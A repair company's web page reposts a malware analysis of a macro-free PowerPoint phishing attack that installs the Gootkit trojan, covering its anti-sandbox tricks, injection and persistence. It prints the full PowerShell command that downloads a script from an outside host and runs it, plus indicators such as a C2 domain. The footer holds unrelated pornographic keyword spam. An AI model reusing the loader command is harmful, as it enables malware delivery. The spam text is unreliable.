錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
新型PPT釣魚攻擊分析(含gootkit木馬詳細(xì)分析)

作者: 佚名  日期:2017-06-18 07:51:33   來源: 本站整理

 1 概述
最近出現(xiàn)了一種新型的PPT釣魚攻擊方式,該種釣魚攻擊方式不需要宏就能實現(xiàn)執(zhí)行powershell的功能,通過網(wǎng)絡(luò)下載gootkit木馬進(jìn)行控制。
2 分析
樣本 MD5:3bff3e4fec2b6030c89e792c05f049fc
在拿到樣本我們放到虛擬機(jī)中進(jìn)行執(zhí)行,可以看到以下,但是這并不會觸發(fā)攻擊
當(dāng)我們用F5放映這個文檔后,并把鼠標(biāo)放到 Loading…Please wait 這個上面,就可以看到如下的畫面,提示我們要啟動一個外部程序
這個時候我們在點擊啟動之后,會看見一個powershell的窗口一閃而過,可以知道樣本執(zhí)行了一段powershell的腳本

我們將樣本后綴名改為zip,看看這段powershell 代碼在何處,我們最終在ppt\slides中找到了這段powershell腳本

我們在slide1.xml.rels 中找到這段powershell腳本,我們可以看到Id為rId2,
我們在對應(yīng)的slide1.xml  中id為rId2  對應(yīng)的動作位為,當(dāng)鼠標(biāo)覆蓋時,就觸發(fā)這個外部事件
id="rId2"action="ppaction://program"/>

我們來看看這段powershell 腳本(已還原),可以看到是下載一個php文件放到臨時文件夾,并重命名為ii.jse
powershell -NoP -NonI -W Hidden -ExecBypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://'+'cccn.nl/'+'c.php',\"$env:temp\ii.jse\");Invoke-Item \"$env:temp\ii.jse\""
我們可以看到這個js  文件,這個文件是經(jīng)過強(qiáng)混淆的作用是下載個exe文件

我們來詳細(xì)分析下下載到的PE文件
MD5 
13cdbd8c31155610b628423dc2720419 
編譯時間 
2017年5月27日14點 
編譯器信息 
Microsoft Visual C++ ver. 8.0 
殼信息 
無殼 
下圖為樣本的大致流程

在樣本的開始階段,做了些反模擬機(jī)的工作,比如一些錯誤的函數(shù)調(diào)用,看返回值是否被修改,執(zhí)行很多無效指令,來達(dá)到模擬機(jī)指令的閾值等等

我們來看看這個樣本中的sub_41E160中的無效指令

之后一個大的sleep來對抗沙箱,因為很多沙箱是有時間范圍的

之后在解密出一段shellcode進(jìn)行執(zhí)行,這段shellcode的主要作用就是解密出一個pe文件然后加載運行,解密出的PE文件

將這個PE文件dump出來,看以下基本信息
MD5 
89509761e2636e2b8a1c6f7ec8823b8f 
編譯器時間 
2011-04-11 02:39:24 
編譯器類型 
Microsoft Visual C++ ver. ~6.0~7.10 – Linker 10 – Visual 2010 
樣本首先會獲取當(dāng)前樣本名稱和mstsc.exe比較,如果不相同,則進(jìn)入注入模塊

樣本首先會創(chuàng)建mstsc.exe

然后通過ZwCreateSection和ZwMapViewOfSection 進(jìn)行注入,并在注入后,獲取啟動地址并進(jìn)行修改

我們手動附加,進(jìn)行修改,然后修改EIP,進(jìn)行調(diào)試,我們將開始地址修改為下面的樣子

由于和原文件代碼相同,我們直接到文件名比較的地方,這里比較相同后,首先會獲取進(jìn)程的權(quán)限
如果判斷是低權(quán)限的進(jìn)程,則會通過ShellExecuteEx  使用管理員權(quán)限啟動

之后在比較當(dāng)前進(jìn)程不是IE和不是任務(wù)進(jìn)程后,打開BIOS注冊表,查找是否在虛擬機(jī)中

并從系統(tǒng)信息中找到沙箱的蛛絲馬跡這個是尋找Sandbox

查找BOCHS

查找的沙箱還有  VBOX 、QEMU、SMCI、Vmware、FTNT-1、VirtualBox、
如果查找到沙箱則進(jìn)入死循環(huán)

然后拷貝自身到如下目錄下,重命名位mqnets.exe,并執(zhí)行

并刪除自身

我們看看在拷貝到IE目錄下樣本會做些什么,在這里比較是在IE目錄下的時候,會發(fā)生跳轉(zhuǎn)

可以通過偽代碼可以發(fā)現(xiàn)在通過比較后。會執(zhí)行一個線程,我們看看這個線程

開頭還是一段判斷自己是否在虛擬機(jī)中

設(shè)置了4個環(huán)境變量分別是
Standalonemtm  true
Vendor_id exe_scheduler_3333
Mainprocessoverride  svchost.exe
RandomListenPortBase  6000

這個線程的主要作用是開啟下面的5個線程

我們首先看第一個線程,主要作用是連接一個網(wǎng)址
網(wǎng)址為  web.1901ospinosct.com 


在連接時候,還包括了探測IE代理的設(shè)置,如果發(fā)現(xiàn),進(jìn)行設(shè)置

關(guān)閉重定向和加入查詢認(rèn)證(SSL)

將接收的文件內(nèi)容放到注冊中

注冊表為  HKEY_CURRENT_USER\Software\binaryImage32_0
HKEY_CURRENT_USER\Software\binaryImage32_1

第二個線程主要是將第一步下載的創(chuàng)建成文件

將IE的保護(hù)模式設(shè)置位禁用
第三個線程將文件進(jìn)行注入

第四個線程主要是保持持久化
創(chuàng)建inf文件

設(shè)置啟動
使用  IEAK\GroupPolicy\PendingGPOs  key  去保持持久化

第五個線程主要是判斷Temp文件是否如下圖的文件,如果有殼殺死自身,并刪除自身


總結(jié)
樣本在對抗沙箱和模擬機(jī)中有很強(qiáng)的針對性,在持久話方面也很獨特,值得研究一下
 



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 中文成人无码精品久久久不卡| 久久久精品人妻无码专区不卡| 亚洲精品无码你懂的| 亚洲av中文无码乱人伦在线播放 | 亚洲午夜无码AV毛片久久| 久久伊人亚洲AV无码网站| 久久精品国产亚洲AV无码偷窥| 免费无码又爽又刺激高潮的视频 | 日日摸夜夜添无码AVA片 | 免费A级毛片无码A∨男男| 人妻中文无码久热丝袜| 亚洲精品无码久久久久APP| 国产精品国产免费无码专区不卡| 成年无码av片完整版| 色综合热无码热国产| 亚洲av成人无码久久精品| 本道久久综合无码中文字幕| 欧洲成人午夜精品无码区久久 | 亚洲精品成人无码中文毛片不卡| 无码无套少妇毛多18PXXXX| 亚洲国产精品无码久久一线 | 国产av无码专区亚洲av果冻传媒| 亚洲一区AV无码少妇电影| 亚洲AV无码欧洲AV无码网站| 国产精品无码制服丝袜| 6080YYY午夜理论片中无码| 18禁超污无遮挡无码免费网站| 午夜无码视频一区二区三区| 精品久久亚洲中文无码| 熟妇无码乱子成人精品| 亚洲AV无码一区二区三区系列| 东京热加勒比无码少妇| 国产无码一区二区在线| 亚洲AⅤ永久无码精品AA | 午夜不卡久久精品无码免费| 久久久久亚洲AV无码专区网站| 无码AV一区二区三区无码| 国模无码一区二区三区| 丰满爆乳无码一区二区三区| 无码人妻丰满熟妇区五十路 | 亚洲乱亚洲乱少妇无码|